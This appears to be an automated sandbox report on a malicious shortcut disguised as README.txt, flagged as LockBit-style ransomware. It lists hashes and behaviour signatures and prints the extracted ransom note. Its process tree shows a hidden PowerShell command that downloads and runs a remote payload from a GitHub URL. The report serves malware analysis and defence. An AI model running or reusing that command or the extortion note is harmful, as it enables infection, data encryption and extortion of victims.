Overview

overview

10

Static

static

1

README.txt.lnk

windows7-x64

3

README.txt.lnk

windows10-2004-x64

10

Resubmissions

26-01-2025 14:47

250126-r5ypsstrbv 10

19-01-2025 12:07

250119-palewaxlbp 10

Analysis

  • max time kernel
    22s
  • max time network
    31s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    26-01-2025 14:47

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    README.txt.lnk

  • Size

    1KB

  • MD5

    e1cff745a65a199bdf9dfebe3f69e3f7

  • SHA1

    8c77e01ceb0ff774a66afa5b7a32b0735e422e9e

  • SHA256

    3b497ec4d80770a5172a72f871528397fde8ea5969aa2c3cde98edb0a6946355

  • SHA512

    7e9204f24290dfdff14200945a31b7d3421122f3fb526845a8250e4325751af5fac226057becf1d0d381f021cca6aae7f6fe0b2d2b517c3441006423de03496c

Score
10/10
lockbitdefense_evasiondiscoveryransomwarespywarestealer

Malware Config

Extracted

Path

C:\RlWCfyLxZ.README.txt

Ransom Note
======================================== !!! ATTENTION !!! Your Files Have Been Encrypted by ManiaCrypt ======================================== What Happened? -------------- All of your important files, documents, photos, and databases have been encrypted using RSA. Without our decryption program, your files cannot be restored. Why Trust Us: -------------------- If we dont give you the decryption program after payment, nobody will trust us. What You Need to Do: -------------------- To get the decryption program, you must contact us. Steps to Restore Your Files: ---------------------------- 1. Open Discord and add the username ballets4. 2. Send us a message and mention your situation. 3. We will provide further instructions for obtaining the decryption program. Important Information: ----------------------- - DO NOT attempt to recover your files using third-party tools. They may damage your data and make recovery impossible. - DO NOT rename, move, or modify the encrypted files. This will also make decryption impossible. - Only we have the tools required to decrypt your files safely and effectively. We are waiting for your message. Time is critical. ======================================== Your Files. Your Responsibility. ========================================

Signatures

  • Lockbit

    Ransomware family with multiple variants released since late 2019.

    ransomwarelockbit
  • Lockbit family
    lockbit
  • Rule to detect Lockbit 3.0 ransomware Windows payload 1 IoCs
  • Renames multiple (607) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

    ransomware
  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Drops desktop.ini file(s) 2 IoCs
  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

    defense_evasion
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Drops file in System32 directory 4 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 2 IoCs
    ransomware
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies Control Panel 2 IoCs
    defense_evasion
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 13 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\README.txt.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4264
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c start notepad.exe & powershell.exe -w h -nop -c "iex(irm 'https://raw.githubusercontent.com/BalletsPistol/d9fb74g8db7d8b7db48df7g8db77f4drb7er8db7fd84d7b1gdb47d8b7brt18bcy87gdfb8hfg74h87fh8bf18h7/main/rev.b64')"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4744
      • C:\Windows\system32\notepad.exe
        notepad.exe
        3⤵
          PID:4904
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -w h -nop -c "iex(irm 'https://raw.githubusercontent.com/BalletsPistol/d9fb74g8db7d8b7db48df7g8db77f4drb7er8db7fd84d7b1gdb47d8b7brt18bcy87gdfb8hfg74h87fh8bf18h7/main/rev.b64')"
          3⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3888
          • C:\Users\Admin\91qsdf.exe
            "C:\Users\Admin\91qsdf.exe"
            4⤵
            • Executes dropped EXE
            • Drops desktop.ini file(s)
            • Sets desktop wallpaper using registry
            • System Location Discovery: System Language Discovery
            • Modifies Control Panel
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:3668
            • C:\Windows\splwow64.exe
              C:\Windows\splwow64.exe 12288
              5⤵
              • Drops file in System32 directory
              PID:4944
            • C:\ProgramData\E996.tmp
              "C:\ProgramData\E996.tmp"
              5⤵
              • Checks computer location settings
              • Executes dropped EXE
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:5092
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /C DEL /F /Q C:\PROGRA~3\E996.tmp >> NUL
                6⤵
                • System Location Discovery: System Language Discovery
                PID:2708
    • C:\Windows\system32\svchost.exe
      C:\Windows\system32\svchost.exe -k PrintWorkflow -s PrintWorkflowUserSvc
      1⤵
        PID:4548
      • C:\Windows\system32\printfilterpipelinesvc.exe
        C:\Windows\system32\printfilterpipelinesvc.exe -Embedding
        1⤵
        • Drops file in System32 directory
        • Suspicious use of WriteProcessMemory
        PID:2316
        • C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
          /insertdoc "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\{FC5A6C9C-E737-40A0-89DF-C62557EAC8F0}.xps" 133823764585760000
          2⤵
          • Checks processor information in registry
          • Enumerates system info in registry
          • Suspicious use of SetWindowsHookEx
          PID:2380

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\$Recycle.Bin\S-1-5-21-3350944739-639801879-157714471-1000\WWWWWWWWWWW
        Filesize

        129B

        MD5

        d209c8d3a2b8aaf3c56e9a41b0e70f10

        SHA1

        dca6c0666263fa29dbba8c980170b5a76c17f1a8

        SHA256

        db6b905d92fb72c99a3b547d5aa204d1251413ed2b96bc1a2d96c4babafe9525

        SHA512

        b4eeb44dc51e7d057fd2bbd0ca2be0da4e050b92bbaca1a81f2109d633f8c38d970944922d754fe595d42b5390dac49545636df87c7d3d8c8e7c600793bac622

        Download Submit

      • C:\ProgramData\E996.tmp
        Filesize

        14KB

        MD5

        294e9f64cb1642dd89229fff0592856b

        SHA1

        97b148c27f3da29ba7b18d6aee8a0db9102f47c9

        SHA256

        917e115cc403e29b4388e0d175cbfac3e7e40ca1742299fbdb353847db2de7c2

        SHA512

        b87d531890bf1577b9b4af41dddb2cdbbfa164cf197bd5987df3a3075983645a3acba443e289b7bfd338422978a104f55298fbfe346872de0895bde44adc89cf

        Download Submit

      • C:\RlWCfyLxZ.README.txt
        Filesize

        1KB

        MD5

        c283c63ae856a725b5e4f127156e4cf6

        SHA1

        d8d9b6f436f2495f52eb248f05998835fc71738d

        SHA256

        9bcbb2fc5d4124bce953bda76499c9a1ddf81a7befb06dd1c0294bedd3c9ba4b

        SHA512

        3a07269c7de4a3ce862aa8f15014bab2f39497c1be0359fd34b2ecb4f417dd9cdcb43c249d7f80563d2facedaece9741310f5e8cd452e15c508e02098be9d0e2

        Download Submit

      • C:\Users\Admin\91qsdf.exe
        Filesize

        147KB

        MD5

        5e0b0af4c133567f05fe4efd9b6936e5

        SHA1

        5469f3b48217924741c024cd2f8fb8f808502654

        SHA256

        bd66fb04d8359196cb918f81f48a662830928dfd3218dfe0cc2418e21615f5a5

        SHA512

        9ccb59ee9688deef4fef9d329337299e126f40cc904acdea288e7b96d72a9c9546b8da2a175aeeefe7547e6167898de5df97f8a123b9189da94d86e4ffb421fa

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_io5zlm5j.3aa.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\{1392248A-3C75-444B-8E09-4092E83DA228}
        Filesize

        4KB

        MD5

        34073dc52b230da426e1530eaaeb12bb

        SHA1

        8621202613948d7faada0f3c9f68229665b85640

        SHA256

        f9532811f96993ff0d3c77d68d1ff55ce59bba365a7a18bc06bd84a32fad0f30

        SHA512

        d283c2a05dc8c9613be415196ddc961209f5a681ceb7e2003d663e896151768ae97c3ef4a1426a59afac2ffd81be8208e45aae393af7ba8edb27cc6f77e70252

        Download Submit

      • C:\Users\Admin\DDDDDDDDDD
        Filesize

        147KB

        MD5

        5695a88a81d1ef727877e9ea543ff290

        SHA1

        9fef5696db5053f1240531d5aa91971e69bdf0c1

        SHA256

        0c1f39631f42fa88d4c593eef887b4af465d30bf02dd7c4e624dec0b9fba7fd0

        SHA512

        111000ddc7bb5919dc3351fda29351f85dfbc50aa0325c459d6ebcbae705350eab634e8aba89ee1762465befd1163a0b7bd8ebd20d1a80646e69a36806adabbd

        Download Submit

      • C:\Users\Admin\Documents\OneNote Notebooks\My Notebook\Open Notebook.onetoc2
        Filesize

        4KB

        MD5

        7b17589dcecc0ed2cefd1d674cdb31b1

        SHA1

        e3263eb849e3e1145876212a6d03be22767f0d67

        SHA256

        ec8a69f46dfd7b0eb572b95e91b899676aa54d9fa45435cebe9b2647b7529dd8

        SHA512

        9c8baf3b41cf0c4102af0e793a5e68b3b97d55aca211dd4ba0a9c94e21631f42683c3eafb509d8b02aaab65eb7c4f31606479c3e58b33ac875dd860e5890338f

        Download Submit

      • F:\$RECYCLE.BIN\S-1-5-21-3350944739-639801879-157714471-1000\DDDDDDDDDDD
        Filesize

        129B

        MD5

        50f6cc437e400d829293b7c559d4b325

        SHA1

        21d832d35d899e7969d1f5bbe8f94bd44a5da2d9

        SHA256

        8cae55642a7133305b70930759719d145c829bd3ba14eeb220786ebda05e1049

        SHA512

        3fb375b17af62d70a4e0441d29791fc784bc50fefbd5b61342ed12c15de2b02f37373dfe3b3a1aa401fdb1ad6b408e8b905948dd6f743fa63b509cbb3136ce66

        Download Submit

      • memory/2380-2969-0x00007FF7C53F0000-0x00007FF7C5400000-memory.dmp

        Filesize

        64KB

        Download

      • memory/2380-2970-0x00007FF7C53F0000-0x00007FF7C5400000-memory.dmp

        Filesize

        64KB

        Download

      • memory/2380-2967-0x00007FF7C53F0000-0x00007FF7C5400000-memory.dmp

        Filesize

        64KB

        Download

      • memory/2380-2966-0x00007FF7C53F0000-0x00007FF7C5400000-memory.dmp

        Filesize

        64KB

        Download

      • memory/2380-2968-0x00007FF7C53F0000-0x00007FF7C5400000-memory.dmp

        Filesize

        64KB

        Download

      • memory/2380-3003-0x00007FF7C3060000-0x00007FF7C3070000-memory.dmp

        Filesize

        64KB

        Download

      • memory/2380-3004-0x00007FF7C3060000-0x00007FF7C3070000-memory.dmp

        Filesize

        64KB

        Download

      • memory/3888-0-0x00007FFFE6FD3000-0x00007FFFE6FD5000-memory.dmp

        Filesize

        8KB

        Download

      • memory/3888-11-0x0000016F33970000-0x0000016F33B32000-memory.dmp

        Filesize

        1.8MB

        Download

      • memory/3888-1-0x0000016F1B0D0000-0x0000016F1B0F2000-memory.dmp

        Filesize

        136KB

        Download